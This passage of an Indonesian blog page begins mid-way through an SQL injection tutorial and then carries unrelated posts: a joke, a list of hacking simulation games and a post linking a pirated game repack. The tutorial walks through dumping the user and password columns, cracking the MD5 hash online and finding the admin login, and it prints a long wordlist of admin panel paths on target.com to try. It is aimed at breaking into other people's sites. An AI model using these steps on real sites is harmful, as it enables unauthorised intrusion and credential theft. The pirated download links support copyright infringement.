Di Coloumns block yang usr_login dan usr_pass atau user_name dan password_admin lalu klik Dump Now.
Setelah itu akan muncul tampilan seperti ini
Pilih salah satu dari user login dan user password tersebut.
*Ada yang aneh?? Password yang ditampilkan bentuknya seperti ini ya?
987d29241cc4f2a7465f2d9356ab3615
987d29241cc4f2a7465f2d9356ab3615
Langkah Kelima, Md5 Password
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?
Caranya cukup mudah, buka saja situs md5crack.com, lalu masukkan kode tersebut di kotak penelusuran. Berdoa saja password anda tersebut cukup lemah, sehingga bisa dipecahkan dengan metode brute force. Setelah anda masukkan, lalu klik Crack hash baby.
Selesai. sekarang cari halaman login atau adminnya.
Ada beberapa halaman login yang bisa kamu pakai (coba satu satu)
Kumpulan halaman admin SQL injection :
http://target.com/admin1.php/
http://target.com/admin1.html
http://target.com/admin2.php
http://target.com/admin2.html
http://target.com/yonetim.php
http://target.com/yonetim.html
http://target.com/yonetici.php
http://target.com/yonetici.html
http://target.com/adm/
http://target.com/admin/
http://target.com/admin/account.php
http://target.com/admin/account.html
http://target.com/admin/index.php
http://target.com/admin/index.html
http://target.com/admin/login.php
http://target.com/admin/login.html
http://target.com/admin/home.php
http://target.com/admin/controlpanel.html
http://target.com/admin/controlpanel.php
http://target.com/admin.php
http://target.com/admin.html
http://target.com/admin/cp.php
http://target.com/admin/cp.html
http://target.com/cp.php
http://target.com/cp.html
http://target.com/administrator/
http://target.com/administrator/index.html
http://target.com/administrator/index.php
http://target.com/administrator/login.html
http://target.com/administrator/login.php
http://target.com/administrator/account.html
http://target.com/administrator/account.php
http://target.com/administrator.php
http://target.com/administrator.html
http://target.com/login.php
http://target.com/login.html
http://target.com/modelsearch/login.php
http://target.com/moderator.php
http://target.com/moderator.html
http://target.com/moderator/login.php
http://target.com/moderator/login.html
http://target.com/moderator/admin.php
http://target.com/moderator/admin.html
http://target.com/moderator/
http://target.com/account.php
http://target.com/account.html
http://target.com/controlpanel/
http://target.com/controlpanel.php
http://target.com/controlpanel.html
http://target.com/admincontrol.php
http://target.com/admincontrol.html
http://target.com/adminpanel.php
http://target.com/adminpanel.html
http://target.com/admin1.asp
http://target.com/admin2.asp
http://target.com/yonetim.asp
http://target.com/yonetici.asp
http://target.com/admin/account.asp
http://target.com/admin/index.asp
http://target.com/admin/login.asp
http://target.com/admin/home.asp
http://target.com/admin/controlpanel.asp
http://target.com/admin.asp
http://target.com/admin/cp.asp
http://target.com/cp.asp
http://target.com/administrator/index.asp
http://target.com/administrator/login.asp
http://target.com/administrator/account.asp
http://target.com/administrator.asp
http://target.com/login.asp
http://target.com/modelsearch/login.asp
http://target.com/moderator.asp
http://target.com/moderator/login.asp
http://target.com/moderator/admin.asp
http://target.com/account.asp
http://target.com/controlpanel.asp
http://target.com/admincontrol.asp
http://target.com/adminpanel.asp
http://target.com/fileadmin/
http://target.com/fileadmin.php
http://target.com/fileadmin.asp
http://target.com/fileadmin.html
http://target.com/administration/
http://target.com/administration.php
http://target.com/administration.html
http://target.com/sysadmin.php
http://target.com/sysadmin.html
http://target.com/phpmyadmin/
http://target.com/myadmin/
http://target.com/sysadmin.asp
http://target.com/sysadmin/
http://target.com/ur-admin.asp
http://target.com/ur-admin.php
http://target.com/ur-admin.html
http://target.com/ur-admin/
http://target.com/Server.php
http://target.com/Server.html
http://target.com/Server.asp
http://target.com/Server/
http://target.com/wp-admin/
http://target.com/administr8.php
http://target.com/administr8.html
http://target.com/administr8/
http://target.com/administr8.asp
http://target.com/webadmin/
http://target.com/webadmin.php
http://target.com/webadmin.asp
http://target.com/webadmin.html
http://target.com/administratie/
http://target.com/admins/
http://target.com/admins.php
http://target.com/admins.asp
http://target.com/admins.html
http://target.com/administrivia/
http://target.com/Database_Administration/
http://target.com/WebAdmin/
http://target.com/useradmin/
http://target.com/sysadmins/
http://target.com/admin1/
http://target.com/system-administration/
http://target.com/administrators/
http://target.com/pgadmin/
http://target.com/directadmin/
http://target.com/staradmin/
http://target.com/ServerAdministrator/
http://target.com/SysAdmin/
http://target.com/administer/
http://target.com/LiveUser_Admin/
http://target.com/sys-admin/
http://target.com/typo3/
http://target.com/panel/
http://target.com/cpanel/
http://target.com/cPanel/
http://target.com/cpanel_file/
http://target.com/platz_login/
http://target.com/rcLogin/
http://target.com/blogindex/
http://target.com/formslogin/
http://target.com/autologin/
http://target.com/support_login/
http://target.com/meta_login/
http://target.com/manuallogin/
http://target.com/simpleLogin/
http://target.com/loginflat/
http://target.com/utility_login/
http://target.com/showlogin/
http://target.com/memlogin/
http://target.com/members/
http://target.com/login-redirect/
http://target.com/sub-login/
http://target.com/wp-login/
http://target.com/login1/
http://target.com/dir-login/
http://target.com/login_db/
http://target.com/xlogin/
http://target.com/smblogin/
http://target.com/customer_login/
http://target.com/UserLogin/
http://target.com/login-us/
http://target.com/acct_login/
http://target.com/admin_area/
http://target.com/bigadmin/
http://target.com/project-admins/
http://target.com/phppgadmin/
http://target.com/pureadmin/
http://target.com/sql-admin/
http://target.com/radmind/
http://target.com/openvpnadmin/
http://target.com/wizmysqladmin/
http://target.com/vadmind/
http://target.com/ezsqliteadmin/
http://target.com/hpwebjetadmin/
http://target.com/newsadmin/
http://target.com/adminpro/
http://target.com/Lotus_Domino_Admin/
http://target.com/bbadmin/
http://target.com/vmailadmin/
http://target.com/Indy_admin/
http://target.com/ccp14admin/
http://target.com/irc-macadmin/
http://target.com/banneradmin/
http://target.com/sshadmin/
http://target.com/phpldapadmin/
http://target.com/macadmin/
http://target.com/administratoraccounts/
http://target.com/admin4_account/
http://target.com/admin4_colon/
http://target.com/radmind-1/
http://target.com/Super-Admin/
http://target.com/AdminTools/
http://target.com/cmsadmin/
http://target.com/SysAdmin2/
http://target.com/globes_admin/
http://target.com/cadmins/
http://target.com/phpSQLiteAdmin/
http://target.com/navSiteAdmin/
http://target.com/server_admin_small/
http://target.com/logo_sysadmin/
http://target.com/server/
http://target.com/database_administration/
http://target.com/power_user/
http://target.com/system_administration/
http://target.com/ss_vms_admin_sm/

Status Facebook Para Setan Setan Di Dunia Maya ( Facebook )

BY Putra Muharril IN No comments

kalau kita orang indonesia punya fb tuh dah biasa ya , bahkan tukang becak pun punya , tapi kalau yang punya fb itu tetangga kita yang dialam gaib gimanaya emmmm mukin beginilah status yang mereka buat
    

Kumpulan Game – Game Simulasi Hacker

BY Putra Muharril IN 1 comment

Kali ini saya akan share tentang game lagi, game ini benar-benar keren . Lebih variatif dan didukung oleh grafis yang keren seakan kita menjadi hacker sesungguhnya. Di game ini kita juga terkadang harus meng-hack sistem traffic light, tower cell phone, phreaking dll . Dijamin bagi anda yang suka hacking akan mengenang masa lalu ;-)
Udah gag sabar? Langsung aja deh saya beri list dari game – game tersebut, ini dia :
1. Hack The Game
img
Game ini merupakan simulasi hacking secara garis besar, jadi tidak seribet klo kita sedang melakukan hacking secara nyata (ya iyalah, kalau lebih ribet mah langsung hacking aja gag usah main game .he.he ). Untuk dapat memainkan game ini diperlukan pengetahuan akan perintah-perintah DOS.
http://www.ziddu.com/download/7892875/HackTheGame.rar.html
2. HACKER EVOLUTION
img
Game ini bernama HACKER EVOLUTION. Dalam game ini, yang kita lakukan adalah mengintip password, melakukan cracking dan jika kita sudah bisa connect ke server target, maka kita bisa melakukan transfer uang. Setelah mendapatkan uang yang cukup banyak, kita bisa meng?upgrade komputer yang kita gunakan. Beberapa keperluan hacking yang bisa diupgrade antara lain Modem. Modem sangat berperan penting di sini. Karena dengan modem yang bagus, kita bisa melakukan proses cracking dan tranfer data dengan lebih cepat. Hal ini bisa mengurangi kemungkinan kegiatan kita terdeteksi oleh pihak target.
Game ini benar-benar menguji skill kita dalam kegiatan hacking. Logika kita benar-benar diuji dalam permainan yang satu ini. Kemahiran kita dalam mengecoh target juga penting karena jika kita bisa mengalihkan perhatian target, aksi kita tidak akan terdeteksi. Satu hal yang menarik di sini adalah kita tidak bisa mengharapkan tampilan yang bagus. Di game ini semuanya berbasis text. Jadi, jika ingin mentransfer sejumlah uang misalnya $2000, kita harus menggunakan perintah transfer 2000. Masih banyak perintah-perintah lain untuk menjalankan aksi kita, misalnya scan, killtrace, config, crack, dan sebagainya.
Tertarik untuk mencoba game yang satu ini ?
http://www11.indowebster.com/bf94b055b5613a9c20531e4c0e29c090.zip
3. HACKER EVOLUTION UNTOLD
img
Game ini sudah pernah di posting di http://blog.cyber4rt.com/2
Game ini sendiri adalah game simulasi seorang hacker yang mencoba menaklukan jaringan internet dalam beberapa misi, yang unik di HEU adalah kita menggunakan semacam komputer virtual dalam memainkan game yang menggunakan command line sebagai interfacenya. Jadi kita seolah benar-benar meng-hack sebuah jaringan komputer.
Yang menantang di HUE adalah kita dituntut banyak berfikir agar saat kita menjalankan aksi tidak banyak meninggalkan banyak trace, karena bisa-bisa misi gagal jika trace-nya mencapai angka 100%. Biasanya pemain akan menggunakan perintah ?killtrace? untuk mengurangi trace sampai dengan 10%, namun hal ini akan menggurangi uang si pemain sampai dengan 500$.
http://www.indowebster.com/Hacker_Evolution_Untold.html
4. UPLINK HACKER ELITE
img
Kejahatan komputer berteknologi tinggi dan spionase industri di Internet tahun 2010.
Anda memainkan Agen Uplink yang membuat hidup dengan pekerjaan tepat untuk perusahaan besar. Tugas Anda melibatkan hacking ke dalam sistem komputer saingan, mencuri data penelitian, menyabotase perusahaan lain, pencucian uang, menghapus bukti, atau framing orang yang tidak bersalah.
Anda menggunakan uang yang Anda hasilkan untuk meng-upgrade sistem komputer Anda, dan membeli perangkat lunak baru dan alat. Seperti pengalaman Anda meningkatkan tingkat Anda menemukan lebih berbahaya dan menguntungkan misi menjadi tersedia. Anda dapat berspekulasi pada pasar saham sepenuhnya bekerja (dan bahkan mempengaruhi hasilnya). Anda dapat mengubah masyarakat akademis atau catatan kriminal. Anda dapat mengalihkan uang dari transfer bank ke rekening Anda sendiri. Anda bahkan dapat mengambil bagian dalam pembangunan virus komputer paling mematikan yang pernah dirancang.
Download : http://www.indowebster.com/Uplink_Hacker_Elite.html | http://www.indowebster.com/hacker_evolution__1.html
Update : http://www.indowebster.com/Uplink_Hacker_Elite_Update.htm

Download Gratis Need For Speed : Shift (2011/MULTI2/Lossless RePackR.G. Packers)

BY Putra Muharril IN No comments



Need For Speed: Shift (2011/MULTI2/Lossless RePack R.G. Packers)
PC | ENG/RUS | Developer: Slightly Mad Studios / EA Black Box | Publisher: Electronic Arts | 2011 | 7.72 GB
Genre: Arcade / Racing (Cars) / Simulator / 3D
Need for Speed ​​? Shift-new racing simulator. It combines not only the realistic physics, beautifully modeled car models and a variety of routes, but also offers players the most truthful experience of driving a racing car. Players will enjoy an exciting and tense race: acceleration, ultra-realistic view from the position of the driver and the new rigid system of collisions. Need for Speed ​​? Shift 2 Unleashed-sequel in the series of racing simulators, originated in 2009 with the release of Need for Speed: Shift and is an offshoot of the famous series of Need for Speed. The game is designed Slightly Mad Studios, bringing together developers and designers involved in creating projects, GT Legends and GTR 2.
The project complements the authentic racing capabilities of new software kernel, the globally processed graphics, innovative views from a camera on the helmet the driver, the night of arrival and the destruction of realistic cars and tracks. A new stage in the development of a series of racing simulators, an innovative network service Autolog, first introduced in the game Need for Speed: Hot Pursuit (2010), brings together friends and helps them to find opponents in various competitions depending on the results achieved.
Features repack
> Repak is based on a Russian license from EA.
> Do not cut / no recoded.
> Game patched to version 1.2.
> Installation time ~ 15 min.
> Installation Dop.PO
System requirements
Windows XP/Vista/Win7
CPU: Intel Core ? 2 Duo 2.0 GHz / AMD Athlon X2 1964 2.4GHz
RAM: 1 GB (Windows XP) / 2 GB (Windows Vista / 7)
HDD: 8 GB
SOUND: DirectX
VIDEO: 512MB, Shader 3.0 or higher Tablet: Not required
DOWNLOAD :
http://www.filesonic.com/file/555784651/NFEShjt.SOUL.part01.rar
http://www.filesonic.com/file/555784661/NFEShjt.SOUL.part02.rar
http://www.filesonic.com/file/555784671/NFEShjt.SOUL.part03.rar
http://www.filesonic.com/file/555784681/NFEShjt.SOUL.part04.rar
http://www.filesonic.com/file/555784691/NFEShjt.SOUL.part05.rar
http://www.filesonic.com/file/555784701/NFEShjt.SOUL.part06.rar
http://www.filesonic.com/file/555784711/NFEShjt.SOUL.part07.rar
http://www.filesonic.com/file/555784721/NFEShjt.SOUL.part08.rar
http://www.filesonic.com/file/555784731/NFEShjt.SOUL.part09.rar
http://www.filesonic.com/file/555784741/NFEShjt.SOUL.part10.rar
http://www.filesonic.com/file/555784751/NFEShjt.SOUL.part11.rar
http://www.filesonic.com/file/555784761/NFEShjt.SOUL.part12.rar
http://www.filesonic.com/file/555784771/NFEShjt.SOUL.part13.rar
http://www.filesonic.com/file/555784781/NFEShjt.SOUL.part14.rar
http://www.filesonic.com/file/555784791/NFEShjt.SOUL.part15.rar
http://www.filesonic.com/file/555784801/NFEShjt.SOUL.part16.rar
http://www.filesonic.com/file/555784811/NFEShjt.SOUL.part17.rar
http://www.filesonic.com/file/555784821/NFEShjt.SOUL.part18.rar

NO PASSWORD !!

Sunday 21 August 2011

10 Games FPS (First Person Shooter) Keren Di Ubuntu

BY Putra Muharril IN No comments


Berikut games FPS (First Person Shooter) yang layak dicoba. Sejumlah games sudah tersedia secara default di repository Ubuntu. Ada juga yang belum tersedia paket deb-nya seperti Cube 2: Sauerbraten. Keseluruhan semua game dibawah ini gratis.




Klik disini untuk mendownload Open Arena di Ubuntu. Atau pergi ke halaman download Open Arena di situs resmi. Open Arena berada dalam lisensi GPL.


2. AssaultCube, (sebelumnya bernama ActionCube)

Walau game ini fokus sebagai game online multiplayer, game ini juga memiliki mode single player. AssaultCube tersedia di repository Ubuntu. Download melalui Synaptic Package Manager/Ubuntu Software Center atau klik langsung disini. Halaman download situs resmi AssaultCube dapat ditemukan disini.


3. Nexuiz

Game ini dapat dimainkan melalui internet ataupun via jaringan lokal. Game mode yang tersedia antara lain classic deathmatch, team deathmatch dan capture the flag. Klik disini untuk install Nexuiz di Ubuntu. Atau download melalui situs resmi melalui halaman ini.


4. Alien Arena

Game sci-fi dengan atmosfer tahun 1950-an, mirip dengan game Quake, Doom, dan Unreal Tournament. Klik disini untuk download Alien Arena di Ubuntu. Kunjungi halaman download resmi Alien Arena di situsnya.


5. Warsow

Warsow adalah game multiplayer fps dengan grafis kartun. Klik disini untuk download di Ubuntu. Kunjungi halaman download resmi Warsow disini.



Urban Terror merupakan game multiplayer first person shooter yang dikembangkan oleh FrozenSand. Urban Terror dapat digambarkan sebagai Hollywood tactical shooter, motto mereka adalah "fun over realism". Download Urban Terror di Ubuntu melalui PlayDeb. Atau download Urban Terror melalui halaman download resmi disini.

7. Tremulous

Tremulous merupakan game FPS yang membutuhkan kerjasama tim untuk memenangkan peperangan. Ada dua pilihan tim, yakni humans dan aliens. Tim yang berperang harus mempertahankan markas mereka dari serangan musuh. Klik disini untuk download Tremulous di Ubuntu. Download Tremulous melalui halaman resmi disini.


World of Padman merupakan game berdasarkan Quake III Arena. Download World of Padman disini. Untuk Ubuntu dapat menginstalnya melalui PlayDeb.

9. Cube 2: Sauerbraten

Download Cube 2: Sauerbraten untuk Linux disini.


Ini game FPS paling berbeda di daftar kita. game ini berdasarkan 2D. Dengan nuansa kartun pada grafisnya. Klik disini untuk instal di Ubuntu. Download melalui situs resmi dapat dikunjungi disini.